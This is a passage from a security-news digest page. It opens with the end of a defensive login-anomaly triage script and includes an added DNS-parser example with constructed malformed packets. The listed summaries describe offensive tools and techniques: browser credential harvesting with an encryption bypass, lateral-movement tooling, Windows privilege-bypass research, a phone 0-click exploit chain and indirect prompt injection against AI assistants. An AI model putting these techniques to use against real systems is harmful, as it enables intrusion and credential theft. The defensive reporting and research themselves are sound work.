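            reasons.append("new-source-for-user")
        if reasons:
            findings.append((e["ts"], e["user"], e["src"], reasons))
    return findings


def run_example():
    baseline = build_baseline(parse_events(BASELINE_LOGS))
    return triage(parse_events(NEW_LOGS), baseline, load_feed(COVERT_NETWORK_FEED))


if __name__ == "__main__":
    for ts, user, src, reasons in run_example():
        print(ts, user, src, ", ".join(reasons))
```

Run as-is it reports three of the four new events: alice's login from the feed-listed range (both reasons), bob's failed attempt from a listed address (indicator only), and bob's successful login from a network he has never used (new source only); alice's login from her usual /24 is silent. The point of keeping the two signals separate is that the feed catches known relays while the baseline catches relays the feed does not yet know about.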

Defending against China-nexus covert networks of compromised devices
Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defend against it
https://www.ncsc.gov.uk/news/defending-against-china-nexus-covert-networks-of-compromised-devices

Passkeys are more secure than traditional ways to log in
Passkeys offer a more usable, secure replacement for passwords and are already supported by most modern devices.
https://www.ncsc.gov.uk/blogs/passkeys-are-more-secure-than-traditional-ways-to-log-in

Apache ActiveMQ RCE
What is the Vulnerability? CVE-2026-34197 is a high-severity remote code execution (RCE) vulnerability affecting Apache ActiveMQ Classic. The flaw resides in the exposed Jolokia JMX-HTTP interface and allows attackers to execute arbitrary commands on the underlying system via crafted broker management requests. Recent reporting indicates that this vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation in the wild and elevating its priority for remediation. What is the recommended Mitigation? Immediate actions: upgrade to ActiveMQ 5.19.4 or later, or 6.2.3 or later; restrict...
https://fortiguard.fortinet.com/threat-signal-report/6428

March 2026 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for March 2026 where I collected and analyzed 282 events: a sharp increase compared to the 176 events of the previous month. In March 2026, Cyber Crime continued to lead the Motivations chart with 64%, ahead of Cyber Espionage at number two with 15%. Hacktivism took over the third position with 6%, ahead of Cyber Warfare with 3%.
https://www.hackmageddon.com/2026/04/16/march-2026-cyber-attacks-statistics/

Azure-Hosted Scanning Cluster Launches WordPress Webshell Discovery Campaign
Sensor Intel Series: March 2026 CVE Trends
https://www.f5.com/labs/articles/azure-hosted-scanning-cluster-launches-wordpress-webshell-discovery-campaign

Hack the AI agent: Build agentic AI security skills with the GitHub Secure Code Game
Learn to find and exploit real-world agentic AI vulnerabilities through five progressive challenges in this free, open source game that over 10,000 developers have already used to sharpen their security skills.
https://github.blog/security/hack-the-ai-agent-build-agentic-ai-security-skills-with-the-github-secure-code-game/

How exposed is your code? Find out in minutes—for free
The new Code Security Risk Assessment gives you a one-click view of vulnerabilities across your organization, at no cost.
https://github.blog/security/application-security/how-exposed-is-your-code-find-out-in-minutes-for-free/

16-31 March 2026 Cyber Attacks Timeline
The second half of March 2026 has been very active from an infosec standpoint, with 124 events and a threat landscape dominated by malware. As always, cyber crime led the motivations chart with 65%, slightly up from the previous timeline.
https://www.hackmageddon.com/2026/04/14/16-31-march-2025-cyber-attacks-timeline/

Common Entra ID Security Assessment Findings – Part 4: Weak Conditional Access Policies
This post is part of a small blog series covering common Entra ID security findings observed during real-world assessments. Each article explores selected findings in more detail to provide a clearer understanding of the underlying risks and practical implications. Conditional Access Policies Conditional Access policies are among the most important security controls in Entra ID. […]
https://blog.compass-security.com/2026/04/common-entra-id-security-assessment-findings-part-4-weak-conditional-access-policies/

Just for Fun – An Unofficial Pen Test Game Module for D&D 5e
Friends, I built an unlicensed, totally unofficial module for my local gaming group based on Dungeons and Dragons 5th Edition, specifically the amazing “Keys from the Golden Vault” heist book. You can download it here. It cannot be resold, and please credit me in distribution. Love to hear your feedback from playtests!
https://tisiphone.net/2026/04/13/just-for-fun-an-unofficial-pen-test-game-module-for-dd-5e/

Medusa Ransomware Attack
What is the Attack? Microsoft Threat Intelligence has identified Storm-1175, a financially motivated threat actor conducting high-tempo ransomware operations leveraging the Medusa ransomware variant. The group specializes in rapidly exploiting vulnerable web-facing systems, often weaponizing newly disclosed vulnerabilities (N-days) and even zero-days before public disclosure. A defining characteristic of this campaign is speed: attackers can move from initial access to full ransomware deployment within 24 hours, significantly reducing detection and response windows. Observed targeting includes: Healthcare ...
https://fortiguard.fortinet.com/threat-signal-report/6398

Bringing Rust to the Pixel Baseband
Posted by Jiacheng Lu, Software Engineer, Google Pixel Team. Google is continuously advancing the security of Pixel devices. We have been focusing on hardening the cellular baseband modem against exploitation. Recognizing the risks associated with the complex modem firmware, Pixel 9 shipped with mitigations against a range of memory-safety vulnerabilities. For Pixel 10, Google is advancing its proactive security measures further. Following our previous discussion on "Deploying Rust in Existing Firmware Codebases", this post shares a concrete application: integrating a memory-safe Rust DNS (Domain Name System) parser into the modem firmware. The new Rust-based DNS parser significantly reduces our security risk by mitigating an entire class of vulnerabilities in a risky area, while also laying...
http://security.googleblog.com/2026/04/bringing-rust-to-pixel-baseband.html
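A DNS message parser is a good illustration of why a baseband team would pick this component first: the wire format is attacker-controlled, compact, and full of length fields and compression pointers. The block below is an added example written for this page, not Google's Rust parser, and it is in Python rather than Rust so that it runs anywhere. What it shows is the set of checks such a parser has to enforce in any language: a bounds check on every read, compression pointers that may only point backwards (which is what guarantees termination on a self-referencing pointer), and the 255-octet name limit. A memory-safe language turns a missing bounds check from memory corruption into a clean panic, but a pointer loop would still hang the parser unless the logic check is there. The packets at the bottom are constructed test vectors, not captured traffic; the function and error names are choices made for the example.

```python
import struct


class DnsParseError(ValueError):
    """Raised for any malformed input: the caller gets an error, never a crash or a hang."""


MAX_NAME_OCTETS = 255  # RFC 1035 section 2.3.4 limit on a name's wire length


def read_name(buf, offset):
    """Decode a domain name starting at `offset`, following compression pointers.
    Returns (name, offset_after_name). Every read is bounds-checked, and a pointer
    is followed only if it points backwards, so a looping or self-referencing
    pointer is rejected instead of spinning forever."""
    labels = []
    wire_len = 0
    resume = None  # where parsing continues after the first pointer is taken
    while True:
        if offset >= len(buf):
            raise DnsParseError("name runs past end of packet")
        length = buf[offset]
        if length & 0xC0 == 0xC0:  # two high bits set: compression pointer
            if offset + 1 >= len(buf):
                raise DnsParseError("truncated compression pointer")
            target = ((length & 0x3F) << 8) | buf[offset + 1]
            if target >= offset:
                raise DnsParseError("compression pointer does not point backwards")
            if resume is None:
                resume = offset + 2
            offset = target
            continue
        if length & 0xC0:  # 0x40 / 0x80 label types are reserved
            raise DnsParseError("unsupported label type")
        offset += 1
        if length == 0:  # root label terminates the name
            break
        if offset + length > len(buf):
            raise DnsParseError("label runs past end of packet")
        wire_len += length + 1
        if wire_len > MAX_NAME_OCTETS:
            raise DnsParseError("name exceeds 255 octets")
        labels.append(buf[offset:offset + length].decode("ascii", "replace"))
        offset += length
    name = ".".join(labels) if labels else "."
    return name, (resume if resume is not None else offset)


def parse_message(buf):
    """Parse the header, question section and answer section of a DNS message."""
    if len(buf) < 12:
        raise DnsParseError("header truncated")
    ident, flags, qdcount, ancount, _nscount, _arcount = struct.unpack("!6H", buf[:12])
    offset = 12
    questions = []
    for _ in range(qdcount):
        name, offset = read_name(buf, offset)
        if offset + 4 > len(buf):
            raise DnsParseError("question truncated")
        qtype, qclass = struct.unpack("!HH", buf[offset:offset + 4])
        offset += 4
        questions.append((name, qtype, qclass))
    answers = []
    for _ in range(ancount):
        name, offset = read_name(buf, offset)
        if offset + 10 > len(buf):
            raise DnsParseError("resource record truncated")
        rtype, rclass, ttl, rdlength = struct.unpack("!HHIH", buf[offset:offset + 10])
        offset += 10
        if offset + rdlength > len(buf):
            raise DnsParseError("rdata truncated")
        answers.append((name, rtype, rclass, ttl, bytes(buf[offset:offset + rdlength])))
        offset += rdlength
    return {"id": ident, "flags": flags, "questions": questions, "answers": answers}


def rejects(buf):
    """True if the parser refuses `buf` with DnsParseError."""
    try:
        parse_message(buf)
    except DnsParseError:
        return True
    return False


# Constructed test vectors (not captured traffic).
# A response for example.com A 192.0.2.1; the answer name is a pointer to offset 12.
GOOD_RESPONSE = (
    b"\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00"  # header: id, flags, counts
    b"\x07example\x03com\x00\x00\x01\x00\x01"             # question: example.com A IN
    b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x01\x2c\x00\x04"   # answer: ptr, A, IN, ttl 300, rdlength 4
    b"\xc0\x00\x02\x01"                                   # rdata: 192.0.2.1
)
# Question name is a pointer to itself: an unguarded parser loops forever here.
SELF_POINTER = b"\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00" b"\xc0\x0c\x00\x01\x00\x01"
# Packet cut off in the middle of the question name.
TRUNCATED = GOOD_RESPONSE[:20]
```

The backward-only rule is stricter than "at most N jumps": it makes the offset strictly decrease on every jump, so termination follows without a counter, and it also rejects pointers into the part of the packet not yet parsed, which is where a sender hides data the parser would otherwise interpret twice.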

Mythos: Just One Piece of the Cybersecurity Puzzle
https://www.legitsecurity.com/blog/mythos-just-one-piece-of-the-cybersecurity-puzzle

Protecting Cookies with Device Bound Session Credentials
Posted by Ben Ackerman, Chrome team, Daniel Rubery, Chrome team and Guillaume Ehinger, Google Account Security team Following our April 2024 announcement, Device Bound Session Credentials (DBSC) is now entering public availability for Windows users on Chrome 146, and expanding to macOS in an upcoming Chrome release. This project represents a significant step forward in our ongoing efforts to combat session theft, which remains a prevalent threat in the modern security landscape. Session theft typically occurs when a user inadvertently downloads malware onto their device. Once active, the malware can silently extract existing session cookies from the browser or wait for the user to log in to new accounts, before exfiltrating these tokens to an attacker-controlled server. Infostealer malware...
http://security.googleblog.com/2026/04/protecting-cookies-with-device-bound.html

TrueConf Zero-Day Attack
What is the Attack? Operation TrueChaos is a targeted cyber espionage campaign exploiting a zero-day vulnerability in the TrueConf video conferencing platform. The campaign primarily targets government entities in Southeast Asia by replacing a legitimate update with a malicious one. Threat actors effectively weaponized the product's trusted update mechanism, transforming it into a covert malware distribution channel. The campaign has been observed leveraging this flaw to deploy the open-source Havoc command-and-control (C2) framework to compromised endpoints, enabling persistent remote access, post-exploitation control, and lateral movement within affected environments. On April 2, 2026, the Cybersecurity...
https://fortiguard.fortinet.com/threat-signal-report/6394

Common Entra ID Security Assessment Findings – Part 3: Weak Privileged Identity Management Configuration
This post is part of a small blog series covering common Entra ID security findings observed during real-world assessments. Each article explores selected findings in more detail to provide a clearer understanding of the underlying risks and practical implications. What Is Privileged Identity Management? Privileged Identity Management (PIM) is a service in Microsoft Entra ID […]
https://blog.compass-security.com/2026/04/common-entra-id-security-assessment-findings-part-3-weak-privileged-identity-management-configuration/

Google Workspace's continuous approach to mitigating indirect prompt injections
Posted by Adam Gavish, Google GenAI Security Team. Indirect prompt injection (IPI) is an evolving threat vector targeting users of complex AI applications with multiple data sources, such as Workspace with Gemini. This technique enables the attacker to influence the behavior of an LLM by injecting malicious instructions into the data or tools used by the LLM as it completes the user's query. This may even be possible without any input directly from the user. IPI is not the kind of technical problem you "solve" and move on. Sophisticated LLMs with increasing use of agentic automation combined with a wide range of content create an ultra-dynamic and evolving playground for adversarial attacks. That's why Google takes a sophisticated and comprehensive approach to these attacks. We're continuously...
http://security.googleblog.com/2026/04/google-workspaces-continuous-approach.html

Securing the open source supply chain across GitHub
Recent attacks on open source focus on exfiltrating secrets; here are the prevention steps you can take today, plus a look at the security capabilities GitHub is working on.
https://github.blog/security/supply-chain-security/securing-the-open-source-supply-chain-across-github/

When AI Writes the Code, What Changes for Security?
https://www.legitsecurity.com/blog/when-ai-writes-the-code-what-changes-for-security

VRP 2025 Year in Review
Posted by Dirk Göhmann, Tony Mendez, and the Vulnerability Rewards Program Team. 2025 marked a special year in the history of vulnerability rewards and bug bounty programs at Google: our 15th anniversary 🎉🎉🎉! Originally started in 2010, our vulnerability reward program (VRP) has seen constant additions and expansions over the past decade and a half, clearly indicating the value the programs under this umbrella contribute to the safety and security of Google and its users, but also highlighting their acceptance by the external research community, without which such programs cannot function. Coming back to 2025 specifically, our VRP once again confirmed the ongoing value of engaging with the external security research community to make Google and its products safer. This was more evident...
http://security.googleblog.com/2026/03/vrp-2025-year-in-review.html

Axios Hijacked: npm Account Takeover Deploys Cross-Platform RAT to Millions
https://www.legitsecurity.com/blog/axios-hijacked-npm-account-takeover-deploys-cross-platform-rat-to-millions

Common Entra ID Security Assessment Findings – Part 2: Privileged Unprotected Groups
In part 2 of our 4-part series on common Entra ID security findings, we show how seemingly harmless group configurations can be abused to bypass security controls and gain high privileges. The post shows scenarios where insufficiently protected groups are used to weaken Conditional Access protections for administrators, enable privilege escalation through PIM for Groups, and grant privileged access to Azure resources, leading to full compromise. We also show how to detect these issues in practice using EntraFalcon and how to mitigate them.
https://blog.compass-security.com/2026/03/common-entra-id-security-assessment-findings-part-2-privileged-unprotected-groups/

A year of open source vulnerability trends: CVEs, advisories, and malware
Reviewed advisories hit a four-year low, malware advisories surged, and CNA publishing grew; here's what changed and what it means for your triage and response.
https://github.blog/security/supply-chain-security/a-year-of-open-source-vulnerability-trends-cves-advisories-and-malware/

1-15 March 2026 Cyber Attacks Timeline
In the first half of March 2026 I collected 95 events (6.34 events/day) with a threat landscape dominated by malware, once again ahead of account takeovers and ransomware.
https://www.hackmageddon.com/2026/03/26/1-15-march-2026-cyber-attacks-timeline/

When Your Scanner Becomes the Weapon: From Trivy to LiteLLM
https://www.legitsecurity.com/blog/when-your-scanner-becomes-the-weapon-from-trivy-to-litellm

Security for the Quantum Era: Implementing Post-Quantum Cryptography in Android
Posted by Eric Lynch, Product Manager, Android and Dom Elliott, Group Product Manager, Google Play Modern digital security is at a turning point. We are on the threshold of using quantum computers to solve "impossible" problems in drug discovery, materials science, and energy—tasks that even the most powerful classical supercomputers cannot handle. However, the same unique ability to consider different options simultaneously also allows these machines to bypass our current digital locks. This puts the public-key cryptography we've relied on for decades at risk, potentially compromising everything from bank transfers to trade secrets. To secure our future, it is vital to adopt the new Post-Quantum Cryptography (PQC) standards National Institute of Standards and Technology (NIST) is urging...
http://security.googleblog.com/2026/03/post-quantum-cryptography-in-android.html

The Trivy Supply Chain Compromise: What Happened and Playbooks to Respond
https://www.legitsecurity.com/blog/the-trivy-supply-chain-compromise-what-happened-and-playbooks-to-respond

Common Entra ID Security Assessment Findings – Part 1: Foreign Enterprise Applications With Privileged API Permissions
This post is part of a small blog series covering common Entra ID security findings observed during real-world assessments. Each article explores selected findings in more detail to support a clearer understanding of the underlying risks and practical implications. Introduction In the vast majority of tenants we review, there are enterprise applications that originate from […]
https://blog.compass-security.com/2026/03/common-entra-id-security-assessment-findings-part-1-foreign-enterprise-applications-with-privileged-api-permissions/

MSSQLand – Lightweight MS-SQL Interaction Tool for Lateral Movement and Post-Exploitation
MSSQLand enables red teams to interact with MS-SQL servers and linked instances in restricted environments without complex T-SQL queries. Assembly-ready tool for lateral movement.
https://www.darknet.org.uk/2026/03/mssqland-lightweight-ms-sql-interaction-tool-for-lateral-movement-and-post-exploitation/

GitHub expands application security coverage with AI‑powered detections
CodeQL and AI‑powered detections work together in GitHub Code Security to identify vulnerabilities across more languages and frameworks.
https://github.blog/security/application-security/github-expands-application-security-coverage-with-ai-powered-detections/

Reflections from the Second NIST Cyber AI Profile Workshop
Thank you to everyone who participated in the Cybersecurity Framework Profile for Artificial Intelligence (Cyber AI Profile) Workshop in January! The input we received on the Preliminary Draft during this workshop has been invaluable and is informing the development of the next draft of the NIST Cyber AI Profile. We are working toward publishing a full workshop summary soon that captures themes and highlights from the event. In the interim, we would like to share a preview of what we heard… Background on the Second Cyber AI Profile Workshop This workshop was a continuation of the past months
https://www.nist.gov/blogs/cybersecurity-insights/reflections-second-nist-cyber-ai-profile-workshop

All aboard: the NIST Cybersecurity for IoT Program is headed to our next stop! Share your input on where we're headed during our Future Directions Two-Day Workshop on March 31st.
Workshop details: we're looking forward to hearing from the community during our "Future Directions" Workshop! Date: March 31 - April 1, 2026. Where: NIST's Gaithersburg campus. Can't make it? We still want to hear from you: email us at IoTSecurity [at] nist.gov. All Aboard for Product Cybersecurity: the NIST Cybersecurity for Internet of Things (IoT) Program was established to help real-world practitioners navigate the gray areas between IT and connected products. This provides clarity when it comes to challenges, available existing resources, and understanding where
https://www.nist.gov/blogs/cybersecurity-insights/all-aboard-nist-cybersecurity-iot-program-headed-our-next-stop-share

Windsurf IDE Extension Drops Malware via Solana Blockchain
Bitdefender researchers have discovered a malicious Windsurf IDE (integrated development environment) extension that deploys a multi-stage NodeJS stealer by using the Solana blockchain as the payload infrastructure.
https://www.bitdefender.com/en-us/blog/labs/windsurf-extension-malware-solana

Investing in the people shaping open source and securing the future together
See how GitHub is investing in open source security: funding maintainers, partnering with Alpha-Omega, and expanding access to help reduce burden and strengthen software supply chains.
https://github.blog/security/supply-chain-security/investing-in-the-people-shaping-open-source-and-securing-the-future-together/

From Enumeration to Findings: The Security Findings Report in EntraFalcon
We just released a big update for EntraFalcon. The new Security Findings Report adds an interactive HTML overview to EntraFalcon that consolidates tenant settings and object-based checks into structured security findings. Over 60 checks, graphical charts, filtering, export, and more options are now available.
https://blog.compass-security.com/2026/03/from-enumeration-to-findings-the-security-findings-report-in-entrafalcon/

Windows and macOS Malware Spreads via Fake “Claude Code” Google Ads
Bitdefender's security researchers have discovered a malicious Google Ads campaign targeting anyone searching for downloads related to Claude, the large language model developed by Anthropic.
https://www.bitdefender.com/en-us/blog/labs/fake-claude-code-google-ads-malware

Credential Stuffing in 2025 – How Combolists, Infostealers and Account Takeover Became an Industry
Credential stuffing drove 22% of all breaches in 2025. How combolists, infostealers and ATO tooling are fuelling enterprise account takeover at scale.
https://www.darknet.org.uk/2026/03/credential-stuffing-in-2025-how-combolists-infostealers-and-account-takeover-became-an-industry/

Global Scam Machines: Inside a Meta-Powered Investment Fraud Ecosystem Spanning 25 Countries
In February-March 2026, Bitdefender Labs identified and mapped a sprawling global scam infrastructure and scalable disinformation-for-profit network that uses trusted news brands, real personalities, fabricated media narratives, emotional hooks, and advanced evasion techniques to drive victims into investment fraud funnels. Between February 9 and March 5, 2026, we analyzed 310 malvertising campaigns distributed through paid advertising on Meta platforms. Key findings: * This is a global, coordinated
https://www.bitdefender.com/en-us/blog/labs/global-investment-scam-network-using-meta-ads

DumpBrowserSecrets – Browser Credential Harvesting with App-Bound Encryption Bypass
DumpBrowserSecrets extracts saved passwords, cookies, OAuth tokens and autofill data from Chrome, Edge, Firefox, Opera and Vivaldi, bypassing App-Bound Encryption via Early Bird APC injection.
https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/

CASI Leaderboard Shifts: Sugar-Coated Poison, and the Expanding AI Attack Surface
AI Security Insights – March 2026
https://www.f5.com/labs/articles/casi-leaderboard-shifts-sugar-coated-poison-and-the-expanding-ai-attack-surface

On the Effectiveness of Mutational Grammar Fuzzing
Mutational grammar fuzzing is a fuzzing technique in which the fuzzer uses a predefined grammar that describes the structure of the samples. When a sample gets mutated, the mutations happen in such a way that any resulting samples still adhere to the grammar rules, thus the structure of the samples gets maintained by the mutation process. In case of coverage-guided grammar fuzzing, if the resulting sample (after the mutation) triggers previously unseen code coverage, this sample is saved to the sample corpus and used as a basis for future mutations. This technique has proven capable of finding complex issues and I have used it successfully in the past, including to find issues in XSLT implementations in web browsers and even JIT engine bugs. However, despite the approach being effective, it...
https://projectzero.google/2026/03/mutational-grammar-fuzzing.html

ClamAV 1.5.2 and 1.4.4 security patch versions published
Today, we are publishing the 1.5.2 and 1.4.4 security patch versions.  The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub with both Alpine and Debian containers. The images on Docker Hub may not be immediately available on release day. Continue reading to learn what changed in each version. 1.5.2 ClamAV 1.5.2 is a patch release with the following fixes: CVE-2026-20031: Fixed an error handling bug in the HTML file parser that may crash the program and cause a denial-of-service (DoS) condition. This issue was introduced in version 1.1.0. The fix is included in 1.5.2 and 1.4.4. Fixed a possible infinite loop when scanning some JPEG files by upgrading affected ClamAV...
https://blog.clamav.net/2026/03/clamav-152-and-144-security-patch.html

WinGet Desired State: Initial Access Established
While not new, a self-referencing LNK file in combination with winget configuration instructions can be a viable initial access payload for environments where the Microsoft Store is not disabled.
https://blog.compass-security.com/2026/03/winget-desired-state-initial-access-established/

Legit Security Named 2026 AI Code Innovator in AppSec, Leader in AppSec Management
Legit Security Named 2026 AI Code Innovator in AppSec, Leader in AppSec Management
https://www.legitsecurity.com/blog/legit-security-named-2026-ai-code-innovator-in-appsec-leader-in-appsec-management

Cultivating a robust and efficient quantum-safe HTTPS
Posted by Chrome Secure Web and Networking Team Today we're announcing a new program in Chrome to make HTTPS certificates secure against quantum computers. The Internet Engineering Task Force (IETF) recently created a working group, PKI, Logs, And Tree Signatures (“PLANTS”), aiming to address the performance and bandwidth challenges that the increased size of quantum-resistant cryptography introduces into TLS connections requiring Certificate Transparency (CT). We recently shared our call to action to secure quantum computing and have written about challenges introduced by quantum-resistant cryptography and some of the steps we've taken to address them in earlier blog posts. To ensure the scalability and efficiency of the ecosystem, Chrome has no immediate plan to add traditional...
http://security.googleblog.com/2026/02/cultivating-robust-and-efficient.html

A Deep Dive into the GetProcessHandleFromHwnd API
In my previous blog post I mentioned the GetProcessHandleFromHwnd API. This was an API I didn't know existed until I found a publicly disclosed UAC bypass using the Quick Assist UI Access application. This API looked interesting so I thought I should take a closer look. I typically start by reading the documentation for an API I don't know about, assuming it's documented at all. It can give you an idea of how long the API has existed as well as its security properties. The documentation's remarks contain the following three statements that I thought were interesting: If the caller has UIAccess, however, they can use a windows hook to inject code into the target process, and from within the target process, send a handle back to the caller. GetProcessHandleFromHwnd is a convenience function...
https://projectzero.google/2026/02/gphfh-deep-dive.html

Staying One Step Ahead: Strengthening Android's Lead in Scam Protection
Posted by Lyubov Farafonova, Product Manager, Phone by Google; Alberto Pastor Nieto, Sr. Product Manager Google Messages and RCS Spam and Abuse We've shared how Android's proactive, multi-layered scam defenses utilize Google AI to protect users around the world from over 10 billion suspected malicious calls and messages every month1. While that scale is significant, the true impact of these protections is best understood through the stories of the individuals they help keep safe every day. This includes people like Majik B., an IT professional in Sunnyvale, California. Despite his technical background, Majik recently found himself on a call that felt dangerously legitimate. While using his Pixel, he received a call that appeared to be from his bank. The number looked correct, the...
http://security.googleblog.com/2026/02/strengthening-android-lead-in-scam-protection.html

Celebrating Two Years of CSF 2.0!
Celebrate this milestone with us! Email us at csf [at] nist.gov (csf[at]nist[dot]gov) or tag @NISTcyber on X telling us what your favorite CSF 2.0 resource is (or how your organization has benefitted from implementing the CSF 2.0). Today marks two years since the publication of the Cybersecurity Framework (CSF) 2.0! Published in 2024, the CSF 2.0 included the addition of a Govern Function, increased emphasis on cybersecurity supply chain risk management, updated categories and subcategories to address current threat and technology shifts, and expansion into a suite of resources designed to make the CSF 2.0 easier to
https://www.nist.gov/blogs/cybersecurity-insights/celebrating-two-years-csf-20

Keeping Google Play & Android app ecosystems safe in 2025
Posted by Vijaya Kaza, VP and GM, App & Ecosystem Trust The Android ecosystem is a thriving global community built on trust, giving billions of users the confidence to download the latest apps. In order to maintain that trust, we're focused on ensuring that apps do not cause real-world harm, such as malware, financial fraud, hidden subscriptions, and privacy invasions. As bad actors leverage AI to change their tactics and launch increasingly sophisticated attacks, we've deepened our investments in AI and real-time defenses over the last year to maintain the upper hand and stop these threats before they reach users. Upgrading Google Play's AI-powered, multi-layered user protections We've seen a clear impact from these safety efforts on Google Play. In 2025, we prevented over...
http://security.googleblog.com/2026/02/keeping-google-play-android-app-ecosystem-safe-2025.html

Bypassing Administrator Protection by Abusing UI Access
In my last blog post I introduced the new Windows feature, Administrator Protection and how it aimed to create a secure boundary for UAC where one didn't exist. I described one of the ways I was able to bypass the feature before it was released. In total I found 9 bypasses during my research that have now all been fixed. In this blog post I wanted to describe the root cause of 5 of those 9 issues, specifically the implementation of UI Access, how this has been a long standing problem with UAC that's been under-appreciated, and how it's being fixed now. A Question of Accessibility Prior to Windows Vista any process running on a user's desktop could control any window created by another, such as by sending window messages. This behavior could be abused if a privileged user, such as SYSTEM,...
https://projectzero.google/2026/02/windows-administrator-protection.html

LummaStealer Is Getting a Second Life Alongside CastleLoader
Bitdefender researchers have discovered a surge in LummaStealer activity, showing how one of the world's most prolific information-stealing malware operations managed to survive despite being almost brought down by law enforcement less than a year ago. LummaStealer is a highly scalable information-stealing threat with a long history, having operated under a malware-as-a-service model since it appeared on the scene in late 2022. The threat quickly evolved into one of the most widely deployed in
https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader

Helpful Skills or Hidden Payloads? Bitdefender Labs Dives Deep into the OpenClaw Malicious Skill Trap
With hundreds of malicious OpenClaw skills blending in among legitimate ones, manually reviewing every script or command isn't realistic — especially when skills are designed to look helpful and familiar. That's why Bitdefender offers a free AI Skills Checker, designed to help people quickly assess whether an AI skill might be risky before they install or run it. Using the tool, you can: * Analyze AI skills and automation tools for suspicious behavior * Spot red flags like hidden execution,
https://www.bitdefender.com/en-us/blog/labs/helpful-skills-or-hidden-payloads-bitdefender-labs-dives-deep-into-the-openclaw-malicious-skill-trap

Supporting Wayland's XDG activation protocol with Gtk/Glib
One of the biggest sore points with Wayland is its focus stealing protection. The idea is good: an application should not be able to bring itself into focus at an unexpected time, only when the currently active application allows it. Support is still lacking however, which might also be due to Gtk/Glib implementing the required XDG activation protocol but not really documenting it. It took me a bit of time to figure this out without any public information, this article will hopefully make things easier for other people. Contents How the XDG activation protocol works State of implementation in Gtk/Glib Starting applications via Gio.AppInfo Starting applications by other means How the XDG activation protocol works The main idea behind the XDG activation protocol...
https://palant.info/2026/02/03/supporting-waylands-xdg-activation-protocol-with-gtk/glib/

Breaking the Sound Barrier, Part II: Exploiting CVE-2024-54529
In the first part of this series, I detailed my journey into macOS security research, which led to the discovery of a type confusion vulnerability (CVE-2024-54529) and a double-free vulnerability (CVE-2025-31235) in the coreaudiod system daemon through a process I call knowledge-driven fuzzing. While the first post focused on the process of finding the vulnerabilities, this post dives into the intricate process of exploiting the type confusion vulnerability. I'll explain the technical details of turning a potentially exploitable crash into a working exploit: a journey filled with dead ends, creative problem solving, and ultimately, success. The Vulnerability: A Quick Recap If you haven't already, I highly recommend reading my detailed writeup on this vulnerability before proceeding. As...
https://projectzero.google/2026/01/sound-barrier-2.html

Android Trojan Campaign Uses Hugging Face Hosting for RAT Payload Delivery
Bitdefender researchers have discovered an Android RAT (remote access trojan) campaign that combines social engineering, the resources of the Hugging Face online platform as staging, and extensive use of Accessibility Services to compromise devices.
https://www.bitdefender.com/en-us/blog/labs/android-trojan-campaign-hugging-face-hosting-rat-payload

New Android Theft Protection Feature Updates: Smarter, Stronger
Posted by Nataliya Stanetsky, Fabricio Ferracioli, Elliot Sisteron, Irene Ang of the Android Security Team Phone theft is more than just losing a device; it's a form of financial fraud that can leave you suddenly vulnerable to personal data and financial theft. That's why we're committed to providing multi-layered defenses that help protect you before, during, and after a theft attempt. Today, we're announcing a powerful set of theft protection feature updates that build on our existing protections, designed to give you greater peace of mind by making your device a much harder target for criminals. Stronger Authentication Safeguards We've expanded our security to protect you against an even wider range of threats. These updates are now available for Android devices running Android...
http://security.googleblog.com/2026/01/android-theft-protection-feature-updates.html

Celebrating Data Privacy Week with NIST's Privacy Engineering Program
Grab your party hats – it's Data Privacy Week! Data Privacy Week is a global initiative led by the National Cybersecurity Alliance to spread awareness about online privacy and empower individuals and businesses to respect privacy, safeguard data, and enable trust. In celebration of this week, the NIST Privacy Engineering Program is reflecting on recent work and looking ahead to what's coming in the new year. Throughout 2026, we plan to continue collaborating with our privacy stakeholder community to develop and advance privacy risk management guidelines to help organizations of all sizes
https://www.nist.gov/blogs/cybersecurity-insights/celebrating-data-privacy-week-nists-privacy-engineering-program

Bypassing Windows Administrator Protection
A headline feature introduced in the latest release of Windows 11, 25H2 is Administrator Protection. The goal of this feature is to replace User Account Control (UAC) with a more robust and importantly, securable system to allow a local user to access administrator privileges only when necessary. This blog post will give a brief overview of the new feature, how it works and how it's different from UAC. I'll then describe some of the security research I undertook while it was in the insider preview builds on Windows 11. Finally I'll detail one of the nine separate vulnerabilities that I found to bypass the feature to silently gain full administrator privileges. All the issues that I reported to Microsoft have been fixed, either prior to the feature being officially released (in optional...
https://projectzero.google/2026/26/windows-administrator-protection.html

A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here?
While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post describes the problems we encountered and recommendations for improvement. Audio Attack Surface The Dolby UDC is part of the 0-click attack surface of most Android devices because of audio transcription in the Google Messages application. Incoming audio messages are transcribed before a user interacts with the message. On Pixel 9, a second process com.google.android.tts also decodes incoming audio. Its purpose is not completely clear, but it seems to be related to making incoming messages searchable.
https://projectzero.google/2026/01/pixel-0-click-part-3.html

A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave
With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the mediacodec context. As per the AOSP documentation, the mediacodec SELinux context is intended to be a constrained (a.k.a sandboxed) context where non-secure software decoders are utilized. Nevertheless, using my DriverCartographer tool, I discovered an interesting device driver, /dev/bigwave that was accessible from the mediacodec SELinux context. BigWave is hardware present on the Pixel SOC that accelerates AV1 decoding tasks, which explains why it is accessible from the mediacodec context. As previous research has copiously affirmed, Android drivers for hardware devices are prime places to find powerful local...
https://projectzero.google/2026/01/pixel-0-click-part-2.html

A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby
